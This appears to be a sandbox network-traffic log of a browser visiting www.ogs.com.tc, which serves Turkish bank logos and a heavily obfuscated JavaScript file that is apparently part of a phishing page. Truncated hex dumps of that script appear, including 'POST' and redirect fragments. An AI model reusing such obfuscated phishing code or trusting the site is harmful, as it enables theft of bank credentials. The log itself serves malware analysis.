2024-05-25 22:17:14 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:14 GMT Content-Type: image/jpeg Content-Length: 20736 Last-Modified: Thu, 23 May 2024 21:37:09 GMT Connection: close ETag: "664fb705-5100" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:14 UTC	16100	IN	Data Raw: ff d8 ff e1 08 61 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 32 30 3a 30 35 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: aExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:20:05"
2024-05-25 22:17:14 UTC	4636	IN	Data Raw: 69 f1 f6 8f 26 d3 0d a9 d8 57 69 aa da ff 00 75 47 4a ac 1d b4 03 11 3e c5 41 cd 1f d9 f6 a2 af f0 fe a6 9f dd 8f 0c ff 00 ba ef bf c5 f1 d3 63 7a 52 48 ba d1 71 5e 6b 67 6d 28 c6 71 cd 32 c8 f9 1a a5 9b 34 e6 72 23 88 69 b2 51 c5 7a af fd 27 af ab 6d 05 ec f8 b5 54 94 55 b3 ae 6e 2d 26 95 a0 85 5b 55 59 14 b3 6c 27 cb 33 fd 9a 18 b0 e2 01 e4 23 97 ec 6b 1a ab ea 26 aa f2 1d 9d b6 03 a9 79 09 63 d4 b4 c0 38 ca f4 a4 f1 cf 91 3d 93 e8 f3 f6 4e 33 4a 90 05 27 01 94 ab cf b5 ee 6a 35 26 ce 1a 7c 51 5e 89 eb 27 e5 9f 34 69 68 45 d9 05 cf fc 86 c2 5f 47 19 99 0e b3 b0 72 9b 1a 8a 5d 54 31 3f d8 6d 24 d8 b6 b9 ca 9b a9 2d 63 95 3d ae 9b ee a9 f2 54 4e 2b e4 36 35 e3 fc b9 d9 39 ae 47 a0 41 8c c2 7d 57 55 97 45 4f 16 6d 95 14 97 fb 22 a4 fc fd a3 cd 06 4b 57 ed Data Ascii: i&WiuGJ>AczRHq^kgm(q24r#iQz'mTUn-&[UYl'3#k&yc8=N3J'j5&\|Q^'4ihE_Gr]T1?m$-c=TN+659GA}WUEOm"KW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49739	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:14 UTC	602	OUT	GET /assets/images/banks/deniz.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:14 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:14 GMT Content-Type: image/jpeg Content-Length: 5774 Last-Modified: Thu, 23 May 2024 21:37:10 GMT Connection: close ETag: "664fb706-168e" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:14 UTC	5774	IN	Data Raw: 52 49 46 46 86 16 00 00 57 45 42 50 56 50 38 20 7a 16 00 00 f0 68 00 9d 01 2a f4 01 c8 00 3e 49 22 8f 45 a2 a2 21 11 58 7c d4 28 04 84 b2 b7 70 bb 00 88 cb 8f f4 bd 84 57 87 c4 7f 6a fd cb f6 b3 b0 bf 74 fc 69 ec cb fb 77 60 f1 a4 eb 0b f6 3f dd bf 76 bf cc 7b f8 ff 4f fd 83 dc d7 e9 0f 60 2f d4 1f f8 3f e0 ff c7 7e b7 f7 3b fd ae f5 05 fa e7 ff 2b fb f7 bb 0f f8 df d9 9f 73 3f b3 df b3 3f 00 1f cd bf d4 75 89 7e e9 7b 07 fe da 7f ff f5 c8 fd b4 f8 4e fe b9 ff 0f f7 03 da 73 ff 07 b0 06 f9 a7 8f ff b3 7e 3e 78 1f fd 57 f2 7b b1 83 d8 9e d3 f3 0c ea 2f 34 bf 8c 7d 74 fc 2f f5 6f da 8f ca 2e 76 78 02 fe 2b fc b7 fc 4f f5 bf da 7f ec 9f b8 7c 95 9a f7 98 17 b2 bf 4e ff 5d f7 07 e9 8f a9 f7 7b 3d 80 bf 99 7f 5a ff 37 eb 9f fa ff 09 2a 00 7f 2e fe e3 ff 23 ee Data Ascii: RIFFWEBPVP8 zh>I"E!X\|(pWjtiw`?v{O`/?~;+s??u~{Ns~>xW{/4}t/o.vx+O\|N]{=Z7.#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:14 UTC	532	OUT	GET /assets/js/script.js HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:15 UTC	291	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:15 GMT Content-Type: text/javascript Content-Length: 165489 Last-Modified: Thu, 23 May 2024 21:37:41 GMT Connection: close ETag: "664fb725-28671" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:15 UTC	16093	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 39 64 66 35 31 28 5f 30 78 34 63 36 62 66 37 2c 5f 30 78 33 38 64 30 63 63 2c 5f 30 78 35 35 34 36 39 38 2c 5f 30 78 33 35 66 65 63 63 2c 5f 30 78 34 35 31 63 65 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 38 39 61 28 5f 30 78 33 38 64 30 63 63 2d 30 78 37 38 2c 5f 30 78 33 35 66 65 63 63 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 62 37 35 62 65 2c 5f 30 78 64 61 66 31 66 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 39 30 35 30 39 28 5f 30 78 35 66 33 37 63 62 2c 5f 30 78 32 34 64 38 39 39 2c 5f 30 78 32 61 37 62 65 30 2c 5f 30 78 62 64 35 61 30 34 2c 5f 30 78 35 36 31 37 31 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 38 39 61 28 5f 30 78 32 61 37 62 65 30 2d 20 2d 30 78 32 38 37 2c 5f 30 78 62 64 35 61 30 34 29 Data Ascii: function _0x29df51(_0x4c6bf7,_0x38d0cc,_0x554698,_0x35fecc,_0x451cec){return _0x289a(_0x38d0cc-0x78,_0x35fecc);}(function(_0x4b75be,_0xdaf1f){function _0x290509(_0x5f37cb,_0x24d899,_0x2a7be0,_0xbd5a04,_0x56171a){return _0x289a(_0x2a7be0- -0x287,_0xbd5a04)
2024-05-25 22:17:15 UTC	16384	IN	Data Raw: 28 30 78 32 33 37 2c 30 78 31 38 33 2c 30 78 39 66 2c 30 78 33 30 39 2c 30 78 31 31 39 29 5d 5b 5f 30 78 32 61 36 65 62 63 28 2d 30 78 39 30 2c 30 78 33 66 2c 2d 30 78 31 32 35 2c 30 78 36 38 2c 2d 30 78 64 35 29 5d 28 27 7c 27 29 2c 5f 30 78 32 34 37 66 65 37 3d 2d 30 78 32 30 34 39 2b 2d 30 78 31 2a 30 78 31 39 39 39 2b 30 78 33 39 65 32 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 73 77 69 74 63 68 28 5f 30 78 39 37 65 62 64 61 5b 5f 30 78 32 34 37 66 65 37 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 76 61 72 20 5f 30 78 33 34 38 34 66 36 3d 5f 30 78 32 36 61 30 64 35 5b 5f 30 78 35 66 32 62 39 65 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 5f 30 78 34 39 34 39 61 38 5b 5f 30 78 31 39 31 61 30 64 28 30 78 35 66 30 2c 30 78 37 34 31 2c 30 78 35 66 64 Data Ascii: (0x237,0x183,0x9f,0x309,0x119)][_0x2a6ebc(-0x90,0x3f,-0x125,0x68,-0xd5)]('\|'),_0x247fe7=-0x2049+-0x1*0x1999+0x39e2;while(!![]){switch(_0x97ebda[_0x247fe7++]){case'0':var _0x3484f6=_0x26a0d5[_0x5f2b9e];continue;case'1':_0x4949a8[_0x191a0d(0x5f0,0x741,0x5fd
2024-05-25 22:17:15 UTC	16384	IN	Data Raw: 37 39 62 64 63 39 2c 5f 30 78 32 34 66 63 62 65 2c 5f 30 78 35 31 36 32 38 62 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 38 39 61 28 5f 30 78 32 38 32 34 30 37 2d 30 78 32 39 31 2c 5f 30 78 34 31 61 33 32 62 29 3b 7d 66 6f 72 28 76 61 72 20 5f 30 78 32 34 35 34 36 35 3d 2d 30 78 31 2a 2d 30 78 31 62 39 39 2b 30 78 34 63 30 2b 2d 30 78 32 30 35 39 3b 5f 30 78 35 62 32 32 36 30 5b 5f 30 78 31 36 37 38 61 31 28 30 78 33 61 32 2c 30 78 34 64 33 2c 30 78 33 65 31 2c 30 78 32 64 65 2c 30 78 33 65 34 29 5d 28 5f 30 78 32 34 35 34 36 35 2c 5f 30 78 32 65 37 33 39 63 5b 5f 30 78 31 34 65 36 34 64 28 30 78 35 37 62 2c 30 78 34 63 36 2c 30 78 36 30 62 2c 30 78 35 62 32 2c 30 78 35 38 62 29 2b 27 68 27 5d 29 3b 5f 30 78 32 34 35 34 36 35 2b 2b 29 7b 69 66 28 5f 30 78 35 Data Ascii: 79bdc9,_0x24fcbe,_0x51628b){return _0x289a(_0x282407-0x291,_0x41a32b);}for(var _0x245465=-0x1*-0x1b99+0x4c0+-0x2059;_0x5b2260[_0x1678a1(0x3a2,0x4d3,0x3e1,0x2de,0x3e4)](_0x245465,_0x2e739c[_0x14e64d(0x57b,0x4c6,0x60b,0x5b2,0x58b)+'h']);_0x245465++){if(_0x5
2024-05-25 22:17:15 UTC	16384	IN	Data Raw: 36 28 30 78 32 64 33 2c 30 78 33 32 39 2c 30 78 33 65 36 2c 30 78 32 33 64 2c 30 78 31 61 37 29 5d 2c 5f 30 78 37 61 39 30 31 62 5b 5f 30 78 34 66 35 31 31 61 28 2d 30 78 31 66 2c 2d 30 78 31 61 64 2c 2d 30 78 66 39 2c 30 78 36 37 2c 2d 30 78 31 63 63 29 5d 29 29 5f 30 78 35 64 30 61 35 33 3d 21 5b 5d 2c 5f 30 78 37 61 39 30 31 62 5b 5f 30 78 34 66 35 31 31 61 28 30 78 31 64 63 2c 30 78 36 33 2c 30 78 37 35 2c 30 78 31 64 33 2c 2d 30 78 31 36 29 5d 28 5f 30 78 31 33 36 36 37 62 2c 5f 30 78 35 64 30 61 35 33 29 3b 65 6c 73 65 7b 76 61 72 20 5f 30 78 62 35 31 37 66 38 3d 5f 30 78 37 61 39 30 31 62 5b 5f 30 78 34 66 35 31 31 61 28 30 78 32 64 2c 2d 30 78 31 30 61 2c 2d 30 78 35 35 2c 2d 30 78 31 31 65 2c 2d 30 78 31 35 65 29 5d 5b 5f 30 78 33 39 66 37 62 30 Data Ascii: 6(0x2d3,0x329,0x3e6,0x23d,0x1a7)],_0x7a901b[_0x4f511a(-0x1f,-0x1ad,-0xf9,0x67,-0x1cc)]))_0x5d0a53=![],_0x7a901b[_0x4f511a(0x1dc,0x63,0x75,0x1d3,-0x16)](_0x13667b,_0x5d0a53);else{var _0xb517f8=_0x7a901b[_0x4f511a(0x2d,-0x10a,-0x55,-0x11e,-0x15e)][_0x39f7b0
2024-05-25 22:17:15 UTC	16384	IN	Data Raw: 5f 30 78 35 62 37 33 35 62 2c 5f 30 78 37 35 62 65 66 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 62 37 33 35 62 25 5f 30 78 37 35 62 65 66 64 3b 7d 2c 27 6b 42 41 43 74 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 39 38 32 30 30 2c 5f 30 78 34 32 32 35 31 62 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 39 38 32 30 30 21 3d 5f 30 78 34 32 32 35 31 62 3b 7d 2c 27 64 6d 5a 43 59 27 3a 5f 30 78 31 35 63 66 61 36 28 30 78 35 63 37 2c 30 78 35 38 63 2c 30 78 37 30 36 2c 30 78 37 33 31 2c 30 78 35 39 33 29 2b 5f 30 78 32 38 30 64 30 37 28 2d 30 78 62 61 2c 2d 30 78 61 36 2c 30 78 39 38 2c 30 78 64 32 2c 2d 30 78 31 30 65 29 2b 5f 30 78 33 62 38 61 34 30 28 30 78 33 65 39 2c 30 78 33 37 33 2c 30 78 35 64 33 2c 30 78 34 35 38 2c 30 78 33 31 66 29 2b 5f 30 78 34 66 31 34 Data Ascii: _0x5b735b,_0x75befd){return _0x5b735b%_0x75befd;},'kBACt':function(_0x398200,_0x42251b){return _0x398200!=_0x42251b;},'dmZCY':_0x15cfa6(0x5c7,0x58c,0x706,0x731,0x593)+_0x280d07(-0xba,-0xa6,0x98,0xd2,-0x10e)+_0x3b8a40(0x3e9,0x373,0x5d3,0x458,0x31f)+_0x4f14
2024-05-25 22:17:15 UTC	16384	IN	Data Raw: 62 63 36 28 30 78 35 36 37 2c 30 78 35 64 63 2c 30 78 35 32 37 2c 30 78 35 31 30 2c 30 78 35 63 31 29 2b 5f 30 78 32 63 38 39 65 31 28 30 78 31 65 63 2c 30 78 34 30 61 2c 30 78 31 66 35 2c 30 78 33 31 38 2c 30 78 33 64 61 29 5d 5b 30 78 31 66 65 37 2b 2d 30 78 31 61 63 35 2b 2d 30 78 35 32 30 5d 2c 5f 30 78 31 64 38 38 33 39 3d 74 68 69 73 5b 5f 30 78 33 63 66 38 35 33 28 30 78 36 30 64 2c 30 78 35 33 39 2c 30 78 35 65 63 2c 30 78 35 39 32 2c 30 78 35 37 63 29 2b 5f 30 78 34 62 32 34 31 37 28 30 78 32 30 38 2c 30 78 32 37 30 2c 30 78 33 36 65 2c 30 78 33 37 65 2c 30 78 32 39 61 29 5d 5b 30 78 39 61 64 2a 2d 30 78 31 2b 2d 30 78 33 33 34 2a 30 78 34 2b 30 78 31 36 38 30 5d 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 39 66 34 61 39 28 5f 30 78 32 39 38 30 33 Data Ascii: bc6(0x567,0x5dc,0x527,0x510,0x5c1)+_0x2c89e1(0x1ec,0x40a,0x1f5,0x318,0x3da)][0x1fe7+-0x1ac5+-0x520],_0x1d8839=this[_0x3cf853(0x60d,0x539,0x5ec,0x592,0x57c)+_0x4b2417(0x208,0x270,0x36e,0x37e,0x29a)][0x9ad-0x1+-0x3340x4+0x1680];function _0x59f4a9(_0x29803
2024-05-25 22:17:15 UTC	16384	IN	Data Raw: 2c 30 78 34 61 2c 30 78 66 33 2c 30 78 31 39 65 29 2b 5f 30 78 33 31 38 63 39 36 28 30 78 36 39 63 2c 30 78 35 33 35 2c 30 78 35 63 36 2c 30 78 35 37 61 2c 30 78 36 31 65 29 2b 5f 30 78 33 64 39 30 37 35 28 30 78 32 61 33 2c 30 78 33 31 30 2c 30 78 31 61 32 2c 30 78 33 61 65 2c 30 78 33 64 39 29 2c 27 55 42 6e 5a 62 27 3a 5f 30 78 33 64 39 30 37 35 28 2d 30 78 61 37 2c 30 78 39 61 2c 30 78 31 36 35 2c 30 78 31 65 33 2c 30 78 31 35 32 29 2c 27 46 73 65 4c 64 27 3a 5f 30 78 33 31 38 63 39 36 28 30 78 34 36 39 2c 30 78 35 61 38 2c 30 78 36 66 39 2c 30 78 34 61 63 2c 30 78 36 37 61 29 2b 5f 30 78 33 64 39 30 37 35 28 30 78 31 61 33 2c 30 78 33 31 65 2c 30 78 31 62 34 2c 30 78 33 65 35 2c 30 78 33 65 63 29 2b 5f 30 78 35 65 64 63 30 63 28 30 78 33 36 35 2c 30 Data Ascii: ,0x4a,0xf3,0x19e)+_0x318c96(0x69c,0x535,0x5c6,0x57a,0x61e)+_0x3d9075(0x2a3,0x310,0x1a2,0x3ae,0x3d9),'UBnZb':_0x3d9075(-0xa7,0x9a,0x165,0x1e3,0x152),'FseLd':_0x318c96(0x469,0x5a8,0x6f9,0x4ac,0x67a)+_0x3d9075(0x1a3,0x31e,0x1b4,0x3e5,0x3ec)+_0x5edc0c(0x365,0
2024-05-25 22:17:15 UTC	16384	IN	Data Raw: 2c 30 78 36 61 63 2c 30 78 36 66 62 2c 30 78 38 32 37 2c 30 78 36 61 37 29 2b 5f 30 78 35 63 62 61 34 32 28 30 78 38 32 30 2c 30 78 37 34 35 2c 30 78 37 65 62 2c 30 78 37 66 31 2c 30 78 39 38 62 29 5d 28 27 3f 27 29 29 7b 69 66 28 5f 30 78 32 61 39 65 34 63 5b 5f 30 78 31 65 30 66 39 39 28 30 78 31 38 2c 30 78 65 2c 30 78 32 33 37 2c 30 78 31 64 2c 30 78 31 38 66 29 5d 28 5f 30 78 32 61 39 65 34 63 5b 5f 30 78 35 36 31 64 64 63 28 30 78 37 32 30 2c 30 78 38 66 65 2c 30 78 37 39 38 2c 30 78 36 35 35 2c 30 78 37 64 34 29 5d 2c 5f 30 78 32 61 39 65 34 63 5b 5f 30 78 35 63 62 61 34 32 28 30 78 37 35 37 2c 30 78 37 35 32 2c 30 78 38 64 38 2c 30 78 37 63 62 2c 30 78 36 30 35 29 5d 29 29 6c 6f 63 61 74 69 6f 6e 5b 5f 30 78 35 36 31 64 64 63 28 30 78 36 39 64 2c Data Ascii: ,0x6ac,0x6fb,0x827,0x6a7)+_0x5cba42(0x820,0x745,0x7eb,0x7f1,0x98b)]('?')){if(_0x2a9e4c[_0x1e0f99(0x18,0xe,0x237,0x1d,0x18f)](_0x2a9e4c[_0x561ddc(0x720,0x8fe,0x798,0x655,0x7d4)],_0x2a9e4c[_0x5cba42(0x757,0x752,0x8d8,0x7cb,0x605)]))location[_0x561ddc(0x69d,
2024-05-25 22:17:15 UTC	16384	IN	Data Raw: 2c 27 69 72 64 69 6e 27 2c 27 51 6d 68 72 68 27 2c 27 73 74 79 6c 65 27 2c 27 57 44 71 66 51 27 2c 27 53 4f 76 5a 41 27 2c 27 6d 74 42 58 6f 27 2c 27 50 55 77 66 44 27 2c 27 61 53 79 48 6c 27 2c 27 6f 53 57 64 54 27 2c 27 64 69 6e 69 7a 27 2c 27 50 66 73 70 56 27 2c 27 7a 49 59 41 6a 27 2c 27 50 4f 53 54 27 2c 27 76 61 5a 62 65 27 2c 27 58 78 79 58 51 27 2c 27 71 75 65 72 79 27 2c 27 67 4a 45 66 75 27 2c 27 63 51 59 56 4b 27 2c 27 6e 5c 78 32 30 66 6f 72 27 2c 27 62 56 63 67 46 27 2c 27 63 4d 6f 6b 67 27 2c 27 6f 5a 6a 56 45 27 2c 27 4f 67 4a 6f 78 27 2c 27 63 6f 6e 73 74 27 2c 27 62 67 6d 41 6d 27 2c 27 4c 75 62 76 58 27 2c 27 53 43 77 70 78 27 2c 27 58 44 41 74 53 27 2c 27 61 6e c4 b1 7a c4 b1 27 2c 27 4d 6b 4f 59 4b 27 2c 27 70 67 71 4a 7a 27 2c 27 6c Data Ascii: ,'irdin','Qmhrh','style','WDqfQ','SOvZA','mtBXo','PUwfD','aSyHl','oSWdT','diniz','PfspV','zIYAj','POST','vaZbe','XxyXQ','query','gJEfu','cQYVK','n\x20for','bVcgF','cMokg','oZjVE','OgJox','const','bgmAm','LubvX','SCwpx','XDAtS','anz','MkOYK','pgqJz','l
2024-05-25 22:17:15 UTC	16384	IN	Data Raw: 30 78 36 35 36 2c 30 78 37 32 30 2c 30 78 35 62 37 2c 30 78 36 64 63 29 5d 29 29 7b 69 66 28 5f 30 78 31 38 61 62 65 65 29 7b 76 61 72 20 5f 30 78 36 31 36 37 36 62 3d 5f 30 78 35 64 31 64 36 35 5b 5f 30 78 34 65 63 30 37 38 28 30 78 33 64 38 2c 30 78 33 39 37 2c 30 78 36 30 38 2c 30 78 34 64 38 2c 30 78 36 31 31 29 5d 28 5f 30 78 34 39 31 65 37 32 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 30 37 61 66 35 3d 6e 75 6c 6c 2c 5f 30 78 36 31 36 37 36 62 3b 7d 7d 65 6c 73 65 7b 69 66 28 5f 30 78 32 63 66 38 35 37 5b 5f 30 78 35 62 62 66 36 64 28 30 78 33 30 31 2c 30 78 32 62 64 2c 30 78 33 65 33 2c 30 78 35 32 36 2c 30 78 33 34 66 29 5d 28 74 79 70 65 6f 66 20 5f 30 78 34 39 38 64 37 31 2c 5f 30 78 32 63 66 38 35 37 5b 5f 30 78 63 62 Data Ascii: 0x656,0x720,0x5b7,0x6dc)])){if(_0x18abee){var _0x61676b=_0x5d1d65[_0x4ec078(0x3d8,0x397,0x608,0x4d8,0x611)](_0x491e72,arguments);return _0x407af5=null,_0x61676b;}}else{if(_0x2cf857[_0x5bbf6d(0x301,0x2bd,0x3e3,0x526,0x34f)](typeof _0x498d71,_0x2cf857[_0xcb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49748	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:15 UTC	603	OUT	GET /assets/images/banks/ziraat.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:15 UTC	282	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:15 GMT Content-Type: image/jpeg Content-Length: 3510 Last-Modified: Thu, 23 May 2024 21:37:21 GMT Connection: close ETag: "664fb711-db6" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:15 UTC	3510	IN	Data Raw: 52 49 46 46 ae 0d 00 00 57 45 42 50 56 50 38 20 a2 0d 00 00 b0 52 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 35 b8 d8 50 09 09 67 6e e1 76 b1 1f c8 1a 4b e6 4f 7d 1f 08 77 67 6e 3a 74 f2 7c e2 6f ed 5f 95 5f e7 3b 48 f9 80 7e 92 7f 83 fc aa ed 01 e6 03 f6 1f f5 df da 1b fd 1f f6 ef 70 1f a7 9f e7 7d c0 3f 52 7a c2 fd 03 3f 5b 7d 34 7f 61 fe 0d ff 64 ff 6b be 01 bf 58 7e ff f6 50 bc bf fd e3 b5 5f ec 3f 92 fe 7f f8 9c f0 cf b0 9f 8b ff 11 d9 93 eb 7f e4 4f 53 bf 91 fd 7a fb d7 e5 d7 e5 47 c9 5f e4 7c 1b f8 e1 fc f7 a8 47 e3 1f c7 ff b5 fe 5a fe 58 71 dd 69 1e 60 5e bd 7c f7 fd 27 f7 bf 1c ad 4d 7b ed ec 01 fc bb fa 4f fa de 41 ef 2a f6 02 fe 89 fe 03 f5 e3 dd 8b fb 3f fd 7e 60 3e 94 ff dd fe 97 e0 2f f9 c7 f6 8f f9 5e b9 de c9 bd 20 3f 70 03 2d Data Ascii: RIFFWEBPVP8 R>I$F"!!5PgnvKO}wgn:t\|o__;H~p}?Rz?[}4adkX~P_?OSzG_\|GZXqi`^\|'M{OA?~`>/^ ?p-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49749	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:15 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-25 22:17:15 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=64379 Date: Sat, 25 May 2024 22:17:15 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49752	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:15 UTC	600	OUT	GET /assets/images/banks/ing.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:16 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:16 GMT Content-Type: image/jpeg Content-Length: 52012 Last-Modified: Thu, 23 May 2024 21:37:16 GMT Connection: close ETag: "664fb70c-cb2c" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:16 UTC	16100	IN	Data Raw: ff d8 ff e1 0c 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 34 38 3a 33 36 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:48:36"
